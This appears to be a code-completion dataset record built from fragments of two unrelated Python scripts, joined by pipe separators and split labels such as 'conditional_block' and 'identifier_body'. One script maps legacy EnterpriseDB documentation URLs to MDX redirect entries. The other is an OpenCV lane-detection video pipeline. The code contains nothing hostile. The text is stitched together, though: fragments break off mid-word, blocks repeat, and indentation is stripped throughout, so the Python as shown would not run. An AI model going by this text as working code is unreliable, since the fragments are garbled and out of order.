print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
| write_redirects_to_mdx_files | identifier_name |
|
add_legacy_redirects.py | redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
produ | url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
| ct_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data: | conditional_block |
Pipeline_for_videos.py | o = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
| s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size, | count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
| conditional_block |
Pipeline_for_videos.py | o = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
| #plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size | random_line_split |
|
Pipeline_for_videos.py |
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,25 | gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary | identifier_body |
|
Pipeline_for_videos.py | (image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
